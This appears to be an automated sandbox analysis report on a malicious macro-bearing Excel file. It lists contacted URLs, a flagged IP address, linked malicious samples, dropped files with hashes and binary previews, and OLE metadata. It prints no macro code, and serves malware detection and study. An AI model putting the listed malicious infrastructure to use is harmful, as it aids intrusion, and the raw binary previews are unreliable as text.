                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorize69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://staging.cortana.ai69F6F346-5229-46C6-AF0A-021EDBBC41A1.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    139.162.8.120
                                                                                                                                                    unknownNetherlands
                                                                                                                                                    63949LINODE-APLinodeLLCUSfalse

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                    Analysis ID:356212
                                                                                                                                                    Start date:22.02.2021
                                                                                                                                                    Start time:19:19:33
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 20s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:SecuriteInfo.com.Heur.15528.xls
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:22
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal76.expl.evad.winXLS@3/6@1/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.255.188.83, 204.79.197.200, 13.107.21.200, 52.147.198.201, 13.88.21.125, 52.109.76.68, 52.109.88.39, 52.109.76.34, 52.109.12.24, 51.104.139.180, 23.210.248.85, 20.54.26.129, 93.184.221.240, 51.103.5.186, 92.122.213.194, 92.122.213.247
                                                                                                                                                    • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, vip2-par02p.wns.notify.trafficmanager.net

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    139.162.8.120SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      LINODE-APLinodeLLCUSSecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      Drawings2.exeGet hashmaliciousBrowse
                                                                                                                                                      • 45.56.79.23
                                                                                                                                                      Sign-1870635479_637332644.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10350.26515.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      SecuriteInfo.com.Heur.1476.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      Sign-92793351_1597657581.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      Invoice467972.jarGet hashmaliciousBrowse
                                                                                                                                                      • 23.239.31.129
                                                                                                                                                      Invoice467972.jarGet hashmaliciousBrowse
                                                                                                                                                      • 23.239.31.129
                                                                                                                                                      SecuriteInfo.com.Heur.22173.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      Deposit_50%PAYMENT TERM -PO09-excel.htmGet hashmaliciousBrowse
                                                                                                                                                      • 45.79.77.20
                                                                                                                                                      Sign_1229872171-1113140666(1).xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      IU-8549 Medical report COVID-19.docGet hashmaliciousBrowse
                                                                                                                                                      • 172.104.97.173
                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10048.24657.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10048.15397.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      Invoice#6026115.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 172.104.247.192
                                                                                                                                                      index_2021-02-17-11_45.dllGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25
                                                                                                                                                      MT0128.jarGet hashmaliciousBrowse
                                                                                                                                                      • 23.239.31.129
                                                                                                                                                      MT0128.jarGet hashmaliciousBrowse
                                                                                                                                                      • 23.239.31.129
                                                                                                                                                      v.dllGet hashmaliciousBrowse
                                                                                                                                                      • 172.104.247.192
                                                                                                                                                      SecuriteInfo.com.Exploit.Siggen3.10048.426.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 176.58.123.25

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19Muligheds.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      DHL_6368638172 documento de recibo,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      pagamento.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      message_zdm (2).htmlGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      Statement-ID21488878391791.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      frank_2021-02-22_02-03.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      Statement-ID72347595684775.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      MR52.vbsGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      Scan_medcal equipment sample_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      rfq02212021.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      RE ICA 40 Sdn Bhd- Purchase Order#6769704.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      RFQ-#09503.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      RFQ_1101983736366355 1101938377388.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      Offer Request 6100003768.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      124992436.docxGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      scarf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      Copy_remittnce.exeGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120
                                                                                                                                                      document-1900770373.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 139.162.8.120

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\69F6F346-5229-46C6-AF0A-021EDBBC41A1
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132891
                                                                                                                                                      Entropy (8bit):5.375859108438167
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:xcQ9DQW+z0XiK
                                                                                                                                                      MD5:DDDC6EBF2C098002BEDC3A69DDA8090D
                                                                                                                                                      SHA1:F27D835B94574B0DD8BF640B2C6DF277DDC87D79
                                                                                                                                                      SHA-256:5AE1CC3C503F396754EB466F6CB5D696EB2672766782A0FCC674BF47652DE65C
                                                                                                                                                      SHA-512:B747B86A760E9E03301AB2BEF7D1EF89DF5A745182D1034859A33776DC1D92E81FBE33B9598030FA5D3B259DE9C20A2B6F43562BE74EBB2B3AFDADA46313483C
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-22T18:20:26">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\F9810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):64846
                                                                                                                                                      Entropy (8bit):7.693818560967215
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:OfmFcq+nbub6aJpa/h/9g/W/iuz9c9ZJRf9wx8fkocM/WWL:5cbueaJpaZlgulEZJRlwWW0
                                                                                                                                                      MD5:4A8836C1D581711F0D530F622117F7C5
                                                                                                                                                      SHA1:37FC14F2BB14A9B0372DFD55065C686284E910AF
                                                                                                                                                      SHA-256:DAED0EDCAB1C1E81FAF7D3157FBA7EFBED6B86FD57CBDDB4B297FBACB0F315E1
                                                                                                                                                      SHA-512:F3512C1960EF32A0D72AE8A021D6177C21444FBBED2C20ECC16112E2F560F10518C0C9A098C29BEA81A9B0974839963A28D9F1350E835B98663B3D6A9CAD1EE0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.N.0....;D.....j......x..=M.:.e.h.~.n..*.U+qi.8....r....}P.......R..f...._.....m..l..].N~L...CAh.j...~s.D....:4.....H?}...%4..'.....hb....M....t,.Wt{....W..T.T...>..+....i% R4.l..[.],.@i.SGf..<..-b.t."...c.*.'..u.O.."d6.Z..)...BZy...T=.6.+....x....W..X..[..v..j.P.J..r......FZ.e^..P........._....d....wo..O...?........b......&........o@........nH.[.(.#......r....^....9...hDW..W-M.#.?....}..t.x.....N......p...f.H.....9.r.6............PK..........!...l.............[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Tue Feb 23 02:20:28 2021, atime=Tue Feb 23 02:20:28 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.672786196074765
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8RNNcXUMuElPCH2YgprAK1Yj89xA+WrjAZ/2bDxLLC5Lu4t2Y+xIBjKZm:8RNXgZr48X6AZiDxy87aB6m
                                                                                                                                                      MD5:0A15C3DA04BCC961BA88053586D8C843
                                                                                                                                                      SHA1:BED9207E685BF68E9595952601FAA9F564B13CA3
                                                                                                                                                      SHA-256:958E487DB9BA6CA60BC9D09A3A97977DAA67460DB5E56973CC78FA4C2E28EEAF
                                                                                                                                                      SHA-512:73E2BEAE5587B6006A7D7895254EB2E830C4A9E45833B843988D8F0B5087833A9B682E1C71AD0E8581F90AD58D9689840C11CB3941E012B60768CFA7ED824B74
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-................. ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.WR.......S....................i..h.a.r.d.z.....~.1.....WR....Desktop.h.......Ny.WR.......Y..............>......[..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......210979...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.15528.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Tue Feb 23 02:20:28 2021, atime=Tue Feb 23 02:20:28 2021, length=93696, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2280
                                                                                                                                                      Entropy (8bit):4.697000249744024
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:80/GU7hHKU5zAHhHKIu9B6p0/GU7hHKU5zAHhHKIu9B6:80/7dKbKIu9K0/7dKbKIu9
                                                                                                                                                      MD5:05CB1CC58914F998F59F45D189A8F831
                                                                                                                                                      SHA1:3F8A9AB7D307E9E3A9252904F01EF7CCF500934D
                                                                                                                                                      SHA-256:1D0BD92D4159412152A4A74A35150B6F76CC608F23358B6F937AF3221B98F695
                                                                                                                                                      SHA-512:6AF74E6EEF7E9C3A6FBB5AE7D3798E0C70402CF003C5758D6C77B95ABF04269ED16A0FACF89765F19EB1B56F1D05A828EF59606B75958BB7AA04C967296ECF53
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...1.(.:................n...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.WR.......S....................i..h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.WR.......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..n..WR.. .SECURI~1.XLS..p......>QwxWR......h........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.5.5.2.8...x.l.s.......e...............-.......d...........>.S......C:\Users\user\Desktop\SecuriteInfo.com.Heur.15528.xls..6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...H.e.u.r...1.5.5.2.8...x.l.s.........:..,.LB.)...As...`.......X.......210979...........!a..%.H.VZAj...0..-.........-..!a..%.H.VZAj...0..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):146
                                                                                                                                                      Entropy (8bit):4.804842734194581
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomM0bMp1uscbMp1mM0bMp1v:dj60Qp+Qph0Qpl
                                                                                                                                                      MD5:5B7147D888D64DA59D28E0B4595D9A2B
                                                                                                                                                      SHA1:EB08786BFCC87F5C6B4224D27834720ECC70928C
                                                                                                                                                      SHA-256:EFC0834821A3BA16E9130839385399219C55CDC39EC65E831B069A2F705B0130
                                                                                                                                                      SHA-512:57A08E9A1043188F6C02351DC31CDA62291EF7BA36F8BBE36776631D37138BD1051CDC28BDAA2573505C09950C681BC77B0920E48042FB2B31E5689D6B918470
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.Heur.15528.xls.LNK=0..SecuriteInfo.com.Heur.15528.xls.LNK=0..[xls]..SecuriteInfo.com.Heur.15528.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\DA810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):127348
                                                                                                                                                      Entropy (8bit):4.307100638025005
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:YJxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFVZXUImJxEtjPOtioVjDGUU1qfDlaGn:yxEtjPOtioVjDGUU1qfDlavx+W2QnAFk
                                                                                                                                                      MD5:5CB47404307BB610062A933364E351D1
                                                                                                                                                      SHA1:78BC0D9AE60DA4483B6625EAE254B8C32026946D
                                                                                                                                                      SHA-256:3C8FEE25D10CD4E03E4243434AE14DB408C50C4E88F863558BC9AFB464DDFF8A
                                                                                                                                                      SHA-512:EC90A506107B0935B3E795D9733FF5B27CD03ACD3C485D7BEA183CE93E35A99EB753CFD5B8979D9010016B7536A81B28AB920AF6E39359F49F8C57436DFDC9B7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1.......>........,..C.a.l.i.b.r.i.1.......?........,..C.a.l.i.b.r.i.1.......4........,..C.a.l.i.b.r.i.1...,...8........,..C.a.l.i.b.r.i.1.......8........,..C.a.l.i.b.r.i.1.......8........,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1...h...8........,..C.a.m.b.r.i.a.1.......<........,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1.......4........,..C.a.l.i.b.r.i.1................,..C.a.l.i.b.r.i.1...........

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 22 11:58:55 2021, Security: 0
                                                                                                                                                      Entropy (8bit):3.473104569518557
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:SecuriteInfo.com.Heur.15528.xls
                                                                                                                                                      File size:93696
                                                                                                                                                      MD5:5a75c6184001a6b8785206f1e2121290
                                                                                                                                                      SHA1:b3ec9fbcc5e96c45e74d503210a51a7ee5ce8132
                                                                                                                                                      SHA256:c71bd3833fbb10cd2f845c83a6ed957f3243990de48a74b4d5cf1602303f4bb1
                                                                                                                                                      SHA512:d1d29f02ae53f7fe04ebab4e628d0e30f0f9f4c1bbe58ef3eed9bc3f44d0b2af4b8df2b81fbcd75ba083f77c52a7827cbb6b089382f3d8c9d6aae12bf8cf2760
                                                                                                                                                      SSDEEP:1536:ca7uDphYHceXVhca+fMHLtyeGxcl8O9pTI4XUXmRgb05SXw1OTsRKvoNGrEJcQ:ca7uDphYHceXVhca+fMHLtyeGxcl8O9v
                                                                                                                                                      File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "SecuriteInfo.com.Heur.15528.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Author:
                                                                                                                                                      Last Saved By:
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2021-02-22 11:58:55
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                      Shared Document:False
                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                      Application Version:917504

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.337819969156
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.250492291218
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . ) ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
